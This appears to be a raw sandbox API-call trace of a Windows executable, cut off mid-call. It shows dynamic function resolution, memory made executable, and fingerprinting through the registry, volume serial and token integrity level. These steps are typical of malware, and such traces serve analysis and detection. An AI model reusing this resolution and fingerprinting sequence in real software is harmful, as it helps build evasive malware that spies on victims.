[0337.936] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.936] SetErrorMode (uMode=0x0) returned 0x8001 [0337.936] GetProcAddress (hModule=0x77740000, lpProcName="ConvertStringSecurityDescriptorToSecurityDescriptorW") returned 0x77751f59 [0337.936] SetErrorMode (uMode=0x8001) returned 0x0 [0337.936] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.936] SetErrorMode (uMode=0x0) returned 0x8001 [0337.936] GetProcAddress (hModule=0x77740000, lpProcName="OpenThreadToken") returned 0x7775432c [0337.936] SetErrorMode (uMode=0x8001) returned 0x0 [0337.936] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.937] SetErrorMode (uMode=0x0) returned 0x8001 [0337.937] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryValueExW") returned 0x777546ad [0337.937] SetErrorMode (uMode=0x8001) returned 0x0 [0337.937] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.937] SetErrorMode (uMode=0x0) returned 0x8001 [0337.937] GetProcAddress (hModule=0x77740000, lpProcName="CryptReleaseContext") returned 0x7774e124 [0337.937] SetErrorMode (uMode=0x8001) returned 0x0 [0337.937] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.937] SetErrorMode (uMode=0x0) returned 0x8001 [0337.937] GetProcAddress (hModule=0x77740000, lpProcName="GetTokenInformation") returned 0x7775431c [0337.937] SetErrorMode (uMode=0x8001) returned 0x0 [0337.937] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.937] SetErrorMode (uMode=0x0) returned 0x8001 [0337.937] GetProcAddress (hModule=0x77740000, lpProcName="CryptDestroyKey") returned 0x7774c51a [0337.937] SetErrorMode (uMode=0x8001) returned 0x0 [0337.937] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.937] SetErrorMode (uMode=0x0) returned 0x8001 [0337.938] GetProcAddress (hModule=0x77740000, lpProcName="AdjustTokenPrivileges") returned 0x7775418e [0337.938] SetErrorMode (uMode=0x8001) returned 0x0 [0337.938] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.938] SetErrorMode (uMode=0x0) returned 0x8001 [0337.938] GetProcAddress (hModule=0x77740000, lpProcName="SetSecurityDescriptorDacl") returned 0x7775415e [0337.938] SetErrorMode (uMode=0x8001) returned 0x0 [0337.938] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.938] SetErrorMode (uMode=0x0) returned 0x8001 [0337.938] GetProcAddress (hModule=0x77740000, lpProcName="GetSecurityDescriptorSacl") returned 0x77754608 [0337.938] SetErrorMode (uMode=0x8001) returned 0x0 [0337.938] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.938] SetErrorMode (uMode=0x0) returned 0x8001 [0337.938] GetProcAddress (hModule=0x77740000, lpProcName="LookupPrivilegeValueW") returned 0x777541b3 [0337.938] SetErrorMode (uMode=0x8001) returned 0x0 [0337.938] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.938] SetErrorMode (uMode=0x0) returned 0x8001 [0337.938] GetProcAddress (hModule=0x77740000, lpProcName="GetLengthSid") returned 0x7775413b [0337.939] SetErrorMode (uMode=0x8001) returned 0x0 [0337.939] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.939] SetErrorMode (uMode=0x0) returned 0x8001 [0337.939] GetProcAddress (hModule=0x77740000, lpProcName="RegDeleteValueW") returned 0x7774cf31 [0337.939] SetErrorMode (uMode=0x8001) returned 0x0 [0337.939] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.939] SetErrorMode (uMode=0x0) returned 0x8001 [0337.939] GetProcAddress (hModule=0x77740000, lpProcName="RegFlushKey") returned 0x7776773f [0337.939] SetErrorMode (uMode=0x8001) returned 0x0 [0337.939] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.939] SetErrorMode (uMode=0x0) returned 0x8001 [0337.939] GetProcAddress (hModule=0x77740000, lpProcName="RegNotifyChangeKeyValue") returned 0x7774e15b [0337.939] SetErrorMode (uMode=0x8001) returned 0x0 [0337.939] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.939] SetErrorMode (uMode=0x0) returned 0x8001 [0337.939] GetProcAddress (hModule=0x77740000, lpProcName="RegQueryInfoKeyW") returned 0x777546e7 [0337.939] SetErrorMode (uMode=0x8001) returned 0x0 [0337.939] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.940] SetErrorMode (uMode=0x0) returned 0x8001 [0337.940] GetProcAddress (hModule=0x77740000, lpProcName="RegEnumKeyW") returned 0x7775445b [0337.940] SetErrorMode (uMode=0x8001) returned 0x0 [0337.940] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.940] SetErrorMode (uMode=0x0) returned 0x8001 [0337.940] GetProcAddress (hModule=0x77740000, lpProcName="InitiateSystemShutdownExW") returned 0x7779db3a [0337.940] SetErrorMode (uMode=0x8001) returned 0x0 [0337.940] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77740000 [0337.940] SetErrorMode (uMode=0x0) returned 0x8001 [0337.940] GetProcAddress (hModule=0x77740000, lpProcName="CryptAcquireContextW") returned 0x7774df14 [0337.940] SetErrorMode (uMode=0x8001) returned 0x0 [0337.940] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0337.940] SetErrorMode (uMode=0x0) returned 0x8001 [0337.940] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteW") returned 0x76a83c71 [0337.940] SetErrorMode (uMode=0x8001) returned 0x0 [0337.940] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0337.940] SetErrorMode (uMode=0x0) returned 0x8001 [0337.941] GetProcAddress (hModule=0x76a70000, lpProcName="ShellExecuteExW") returned 0x76a91e46 [0337.941] SetErrorMode (uMode=0x8001) returned 0x0 [0337.941] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x76a70000 [0337.941] SetErrorMode (uMode=0x0) returned 0x8001 [0337.941] GetProcAddress (hModule=0x76a70000, lpProcName="SHGetFolderPathW") returned 0x76af5708 [0337.941] SetErrorMode (uMode=0x8001) returned 0x0 [0337.941] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.941] SetErrorMode (uMode=0x0) returned 0x8001 [0337.941] GetProcAddress (hModule=0x76370000, lpProcName="PathFileExistsW") returned 0x763845bf [0337.941] SetErrorMode (uMode=0x8001) returned 0x0 [0337.941] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.941] SetErrorMode (uMode=0x0) returned 0x8001 [0337.941] GetProcAddress (hModule=0x76370000, lpProcName="PathIsURLW") returned 0x763855bf [0337.941] SetErrorMode (uMode=0x8001) returned 0x0 [0337.941] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.941] SetErrorMode (uMode=0x0) returned 0x8001 [0337.942] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryEmptyW") returned 0x763acd81 [0337.942] SetErrorMode (uMode=0x8001) returned 0x0 [0337.942] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.942] SetErrorMode (uMode=0x0) returned 0x8001 [0337.942] GetProcAddress (hModule=0x76370000, lpProcName="StrCmpNIW") returned 0x76384745 [0337.942] SetErrorMode (uMode=0x8001) returned 0x0 [0337.942] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.942] SetErrorMode (uMode=0x0) returned 0x8001 [0337.942] GetProcAddress (hModule=0x76370000, lpProcName="PathRenameExtensionW") returned 0x763ad32a [0337.942] SetErrorMode (uMode=0x8001) returned 0x0 [0337.942] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.942] SetErrorMode (uMode=0x0) returned 0x8001 [0337.942] GetProcAddress (hModule=0x76370000, lpProcName="StrStrIW") returned 0x763846e9 [0337.942] SetErrorMode (uMode=0x8001) returned 0x0 [0337.942] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.942] SetErrorMode (uMode=0x0) returned 0x8001 [0337.942] GetProcAddress (hModule=0x76370000, lpProcName="PathMatchSpecW") returned 0x763886f7 [0337.943] SetErrorMode (uMode=0x8001) returned 0x0 [0337.943] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.943] SetErrorMode (uMode=0x0) returned 0x8001 [0337.943] GetProcAddress (hModule=0x76370000, lpProcName="PathCombineW") returned 0x7638c39c [0337.943] SetErrorMode (uMode=0x8001) returned 0x0 [0337.943] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.943] SetErrorMode (uMode=0x0) returned 0x8001 [0337.943] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveFileSpecW") returned 0x76383248 [0337.943] SetErrorMode (uMode=0x8001) returned 0x0 [0337.943] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.943] SetErrorMode (uMode=0x0) returned 0x8001 [0337.943] GetProcAddress (hModule=0x76370000, lpProcName="PathAddBackslashW") returned 0x7638c177 [0337.943] SetErrorMode (uMode=0x8001) returned 0x0 [0337.943] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.943] SetErrorMode (uMode=0x0) returned 0x8001 [0337.943] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfW") returned 0x763b066c [0337.943] SetErrorMode (uMode=0x8001) returned 0x0 [0337.943] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.944] SetErrorMode (uMode=0x0) returned 0x8001 [0337.944] GetProcAddress (hModule=0x76370000, lpProcName="PathUnquoteSpacesW") returned 0x76385331 [0337.944] SetErrorMode (uMode=0x8001) returned 0x0 [0337.944] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.944] SetErrorMode (uMode=0x0) returned 0x8001 [0337.944] GetProcAddress (hModule=0x76370000, lpProcName="PathSkipRootW") returned 0x7639fbf5 [0337.944] SetErrorMode (uMode=0x8001) returned 0x0 [0337.944] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.944] SetErrorMode (uMode=0x0) returned 0x8001 [0337.944] GetProcAddress (hModule=0x76370000, lpProcName="PathFindExtensionW") returned 0x7638a1b9 [0337.944] SetErrorMode (uMode=0x8001) returned 0x0 [0337.944] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.944] SetErrorMode (uMode=0x0) returned 0x8001 [0337.944] GetProcAddress (hModule=0x76370000, lpProcName="SHDeleteValueW") returned 0x7637fcca [0337.944] SetErrorMode (uMode=0x8001) returned 0x0 [0337.944] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.944] SetErrorMode (uMode=0x0) returned 0x8001 [0337.945] GetProcAddress (hModule=0x76370000, lpProcName="wvnsprintfA") returned 0x7639edfe [0337.945] SetErrorMode (uMode=0x8001) returned 0x0 [0337.945] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.945] SetErrorMode (uMode=0x0) returned 0x8001 [0337.945] GetProcAddress (hModule=0x76370000, lpProcName="PathIsDirectoryW") returned 0x7637ff07 [0337.945] SetErrorMode (uMode=0x8001) returned 0x0 [0337.945] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.945] SetErrorMode (uMode=0x0) returned 0x8001 [0337.945] GetProcAddress (hModule=0x76370000, lpProcName="PathRemoveBackslashW") returned 0x76385c62 [0337.945] SetErrorMode (uMode=0x8001) returned 0x0 [0337.945] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.945] SetErrorMode (uMode=0x0) returned 0x8001 [0337.945] GetProcAddress (hModule=0x76370000, lpProcName="UrlUnescapeA") returned 0x7639c6fb [0337.945] SetErrorMode (uMode=0x8001) returned 0x0 [0337.945] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76370000 [0337.945] SetErrorMode (uMode=0x0) returned 0x8001 [0337.945] GetProcAddress (hModule=0x76370000, lpProcName="PathQuoteSpacesW") returned 0x763ace21 [0337.946] SetErrorMode (uMode=0x8001) returned 0x0 [0337.946] LoadLibraryA (lpLibFileName="PSAPI.DLL") returned 0x75ad0000 [0337.946] SetErrorMode (uMode=0x0) returned 0x8001 [0337.946] GetProcAddress (hModule=0x75ad0000, lpProcName="GetModuleFileNameExW") returned 0x75ad13f0 [0337.946] SetErrorMode (uMode=0x8001) returned 0x0 [0337.946] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0337.946] SetErrorMode (uMode=0x0) returned 0x8001 [0337.946] GetProcAddress (hModule=0x75ae0000, lpProcName="CLSIDFromString") returned 0x75afe599 [0337.946] SetErrorMode (uMode=0x8001) returned 0x0 [0337.946] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0337.946] SetErrorMode (uMode=0x0) returned 0x8001 [0337.947] GetProcAddress (hModule=0x75ae0000, lpProcName="CoInitializeEx") returned 0x75b209ad [0337.947] SetErrorMode (uMode=0x8001) returned 0x0 [0337.947] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0337.947] SetErrorMode (uMode=0x0) returned 0x8001 [0337.947] GetProcAddress (hModule=0x75ae0000, lpProcName="CreateStreamOnHGlobal") returned 0x75b0363b [0337.947] SetErrorMode (uMode=0x8001) returned 0x0 [0337.947] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0337.947] SetErrorMode (uMode=0x0) returned 0x8001 [0337.947] GetProcAddress (hModule=0x75ae0000, lpProcName="CoSetProxyBlanket") returned 0x75af5ea5 [0337.947] SetErrorMode (uMode=0x8001) returned 0x0 [0337.947] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0337.947] SetErrorMode (uMode=0x0) returned 0x8001 [0337.947] GetProcAddress (hModule=0x75ae0000, lpProcName="CoCreateInstance") returned 0x75b29d0b [0337.947] SetErrorMode (uMode=0x8001) returned 0x0 [0337.947] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x75ae0000 [0337.947] SetErrorMode (uMode=0x0) returned 0x8001 [0337.947] GetProcAddress (hModule=0x75ae0000, lpProcName="CoUninitialize") returned 0x75b286d3 [0337.947] SetErrorMode (uMode=0x8001) returned 0x0 [0337.948] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.948] SetErrorMode (uMode=0x0) returned 0x8001 [0337.948] GetProcAddress (hModule=0x76950000, lpProcName="DeleteObject") returned 0x76965689 [0337.948] SetErrorMode (uMode=0x8001) returned 0x0 [0337.948] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.948] SetErrorMode (uMode=0x0) returned 0x8001 [0337.948] GetProcAddress (hModule=0x76950000, lpProcName="GetDeviceCaps") returned 0x76964de0 [0337.948] SetErrorMode (uMode=0x8001) returned 0x0 [0337.948] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.948] SetErrorMode (uMode=0x0) returned 0x8001 [0337.948] GetProcAddress (hModule=0x76950000, lpProcName="CreateDCW") returned 0x7696e743 [0337.948] SetErrorMode (uMode=0x8001) returned 0x0 [0337.948] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.948] SetErrorMode (uMode=0x0) returned 0x8001 [0337.948] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleDC") returned 0x769654f4 [0337.948] SetErrorMode (uMode=0x8001) returned 0x0 [0337.948] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.949] SetErrorMode (uMode=0x0) returned 0x8001 [0337.949] GetProcAddress (hModule=0x76950000, lpProcName="SelectObject") returned 0x76964f70 [0337.949] SetErrorMode (uMode=0x8001) returned 0x0 [0337.949] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.949] SetErrorMode (uMode=0x0) returned 0x8001 [0337.949] GetProcAddress (hModule=0x76950000, lpProcName="CreateCompatibleBitmap") returned 0x76965f49 [0337.949] SetErrorMode (uMode=0x8001) returned 0x0 [0337.949] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.949] SetErrorMode (uMode=0x0) returned 0x8001 [0337.949] GetProcAddress (hModule=0x76950000, lpProcName="BitBlt") returned 0x76965ea6 [0337.949] SetErrorMode (uMode=0x8001) returned 0x0 [0337.949] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x76950000 [0337.949] SetErrorMode (uMode=0x0) returned 0x8001 [0337.949] GetProcAddress (hModule=0x76950000, lpProcName="DeleteDC") returned 0x769658b3 [0337.949] SetErrorMode (uMode=0x8001) returned 0x0 [0337.949] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.976] SetErrorMode (uMode=0x0) returned 0x8001 [0337.976] GetProcAddress (hModule=0x75f20000, lpProcName="InternetConnectA") returned 0x75f449e9 [0337.976] SetErrorMode (uMode=0x8001) returned 0x0 [0337.976] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.977] SetErrorMode (uMode=0x0) returned 0x8001 [0337.977] GetProcAddress (hModule=0x75f20000, lpProcName="InternetReadFile") returned 0x75f3b406 [0337.977] SetErrorMode (uMode=0x8001) returned 0x0 [0337.977] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.977] SetErrorMode (uMode=0x0) returned 0x8001 [0337.977] GetProcAddress (hModule=0x75f20000, lpProcName="HttpQueryInfoA") returned 0x75f3a33e [0337.977] SetErrorMode (uMode=0x8001) returned 0x0 [0337.977] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.977] SetErrorMode (uMode=0x0) returned 0x8001 [0337.977] GetProcAddress (hModule=0x75f20000, lpProcName="InternetQueryOptionA") returned 0x75f31b56 [0337.977] SetErrorMode (uMode=0x8001) returned 0x0 [0337.977] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.977] SetErrorMode (uMode=0x0) returned 0x8001 [0337.977] GetProcAddress (hModule=0x75f20000, lpProcName="HttpOpenRequestA") returned 0x75f44c7d [0337.977] SetErrorMode (uMode=0x8001) returned 0x0 [0337.978] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.978] SetErrorMode (uMode=0x0) returned 0x8001 [0337.978] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCrackUrlA") returned 0x75f2d075 [0337.978] SetErrorMode (uMode=0x8001) returned 0x0 [0337.978] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.978] SetErrorMode (uMode=0x0) returned 0x8001 [0337.978] GetProcAddress (hModule=0x75f20000, lpProcName="InternetSetOptionA") returned 0x75f375e8 [0337.978] SetErrorMode (uMode=0x8001) returned 0x0 [0337.978] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.978] SetErrorMode (uMode=0x0) returned 0x8001 [0337.978] GetProcAddress (hModule=0x75f20000, lpProcName="InternetOpenA") returned 0x75f4f18e [0337.978] SetErrorMode (uMode=0x8001) returned 0x0 [0337.978] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.978] SetErrorMode (uMode=0x0) returned 0x8001 [0337.978] GetProcAddress (hModule=0x75f20000, lpProcName="InternetCloseHandle") returned 0x75f3ab49 [0337.978] SetErrorMode (uMode=0x8001) returned 0x0 [0337.978] LoadLibraryA (lpLibFileName="WININET.dll") returned 0x75f20000 [0337.979] SetErrorMode (uMode=0x0) returned 0x8001 [0337.979] GetProcAddress (hModule=0x75f20000, lpProcName="HttpSendRequestA") returned 0x75fb18f8 [0337.979] SetErrorMode (uMode=0x8001) returned 0x0 [0337.979] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76690000 [0337.979] SetErrorMode (uMode=0x0) returned 0x8001 [0337.979] GetProcAddress (hModule=0x76690000, lpProcName="ObtainUserAgentString") returned 0x766c1d76 [0337.979] SetErrorMode (uMode=0x8001) returned 0x0 [0337.979] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x761b0000 [0337.979] SetErrorMode (uMode=0x0) returned 0x8001 [0337.979] GetProcAddress (hModule=0x761b0000, lpProcName=0x9) returned 0x761b3eae [0337.979] SetErrorMode (uMode=0x8001) returned 0x0 [0337.979] LoadLibraryA (lpLibFileName="Secur32.dll") returned 0x75690000 [0337.980] SetErrorMode (uMode=0x0) returned 0x8001 [0337.980] GetProcAddress (hModule=0x75690000, lpProcName="GetUserNameExW") returned 0x7582a415 [0337.980] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x72940000, dwSize=0x120000, flNewProtect=0x40, lpflOldProtect=0x3650c00 | out: lpflOldProtect=0x3650c00*=0x2) returned 1 [0337.982] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x401000, dwSize=0xf20f, flNewProtect=0x20, lpflOldProtect=0x3650c00 | out: lpflOldProtect=0x3650c00*=0x40) returned 1 [0337.982] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x411000, dwSize=0x2bfe, flNewProtect=0x4, lpflOldProtect=0x3650c00 | out: lpflOldProtect=0x3650c00*=0x40) returned 1 [0337.982] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x414000, dwSize=0x696c, flNewProtect=0x4, lpflOldProtect=0x3650c00 | out: lpflOldProtect=0x3650c00*=0x40) returned 1 [0337.982] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x41b000, dwSize=0xc08, flNewProtect=0x4, lpflOldProtect=0x3650c00 | out: lpflOldProtect=0x3650c00*=0x40) returned 1 [0337.982] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x400000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x3650c00 | out: lpflOldProtect=0x3650c00*=0x40) returned 1 [0337.982] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0337.982] GetCurrentProcessId () returned 0x7e8 [0337.983] CryptAcquireContextW (in: phProv=0x417e5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x417e5c*=0x54ee98) returned 1 [0337.993] RtlAddVectoredExceptionHandler (FirstHandler=0x1, VectoredHandler=0x4084e9) returned 0x54d7b8 [0337.993] GetComputerNameW (in: lpBuffer=0x18fcc8, nSize=0x18fcac | out: lpBuffer="YKYD69Q", nSize=0x18fcac) returned 1 [0337.993] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc80 | out: phkResult=0x18fc80*=0x134) returned 0x0 [0337.993] RegQueryValueExW (in: hKey=0x134, lpValueName="InstallDate", lpReserved=0x0, lpType=0x18fcb4, lpData=0x18fcb0, lpcbData=0x18fc7c*=0x4 | out: lpType=0x18fcb4*=0x4, lpData=0x18fcb0*=0x0, lpcbData=0x18fc7c*=0x4) returned 0x0 [0337.993] RegCloseKey (hKey=0x134) returned 0x0 [0337.993] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x1, phkResult=0x18fc84 | out: phkResult=0x18fc84*=0x134) returned 0x0 [0337.993] RegQueryValueExW (in: hKey=0x134, lpValueName="DigitalProductId", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x18fc98*=0x0) returned 0x2 [0337.994] RegCloseKey (hKey=0x134) returned 0x0 [0337.994] GetVersionExW (in: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x18fd08*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0337.994] GlobalMemoryStatusEx (in: lpBuffer=0x18fe60 | out: lpBuffer=0x18fe60) returned 1 [0337.994] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18fe38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18fe38*=0x705ba84c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0337.994] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff68 | out: Wow64Process=0x18ff68) returned 1 [0337.994] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x4177f0, dwRevision=0x1 | out: pSecurityDescriptor=0x4177f0) returned 1 [0337.994] SetSecurityDescriptorDacl (in: pSecurityDescriptor=0x4177f0, bDaclPresent=1, pDacl=0x0, bDaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0337.994] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0337.995] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x54c738, lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4 | out: lpbSaclPresent=0x18f4e0, pSacl=0x18f4e8, lpbSaclDefaulted=0x18f4e4) returned 1 [0337.995] SetSecurityDescriptorSacl (in: pSecurityDescriptor=0x4177f0, bSaclPresent=1, pSacl=0x54c74c, bSaclDefaulted=0 | out: pSecurityDescriptor=0x4177f0) returned 1 [0337.995] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18f220 | out: pszPath="C:\\Windows") returned 0x0 [0337.996] PathAddBackslashW (in: pszPath="C:\\Windows" | out: pszPath="C:\\Windows\\") returned="" [0337.996] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\Windows\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="") returned 0 [0337.997] PathRemoveBackslashW (in: pszPath="C:\\Windows\\" | out: pszPath="C:\\Windows") returned="" [0337.997] PathRemoveFileSpecW (in: pszPath="C:\\Windows" | out: pszPath="C:\\") returned 1 [0337.997] PathAddBackslashW (in: pszPath="C:\\" | out: pszPath="C:\\") returned="" [0337.997] GetVolumeNameForVolumeMountPointW (in: lpszVolumeMountPoint="C:\\", lpszVolumeName=0x18f428, cchBufferLength=0x64 | out: lpszVolumeName="\\\\?\\Volume{bb11c9c2-5dad-11e7-a275-806e6f6e6963}\\") returned 1 [0337.997] CLSIDFromString (in: lpsz="{bb11c9c2-5dad-11e7-a275-806e6f6e6963}", pclsid=0x417a28 | out: pclsid=0x417a28*(Data1=0xbb11c9c2, Data2=0x5dad, Data3=0x11e7, Data4=([0]=0xa2, [1]=0x75, [2]=0x80, [3]=0x6e, [4]=0x6f, [5]=0x6e, [6]=0x69, [7]=0x63))) returned 0x0 [0337.997] GetVersionExW (in: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x77ce3472, dwMinorVersion=0x0, dwBuildNumber=0x5557b0, dwPlatformId=0x0, szCSDVersion="ⴼ疝ⴼ疝") | out: lpVersionInformation=0x18f3d4*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0337.997] GetVersionExW (in: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x18f478, dwMinorVersion=0x407dfd, dwBuildNumber=0x6, dwPlatformId=0x0, szCSDVersion="Ĝ") | out: lpVersionInformation=0x18f3c0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0337.997] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20008, TokenHandle=0x18f4ec | out: TokenHandle=0x18f4ec*=0x13c) returned 1 [0337.997] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f4e8 | out: TokenInformation=0x0, ReturnLength=0x18f4e8) returned 0 [0337.997] GetLastError () returned 0x7a [0337.997] GetTokenInformation (in: TokenHandle=0x13c, TokenInformationClass=0x19, TokenInformation=0x35df9b0, TokenInformationLength=0x14, ReturnLength=0x18f4e8 | out: TokenInformation=0x35df9b0, ReturnLength=0x18f4e8) returned 1 [0337.997] GetSidSubAuthorityCount (pSid=0x35df9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x35df9b9 [0337.997] GetSidSubAuthority (pSid=0x35df9b8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x35df9c0 [0337.997] CloseHandle (hObject=0x13c) returned 1 [0337.997] CreateEventW (lpEventAttributes=0x4177e4, 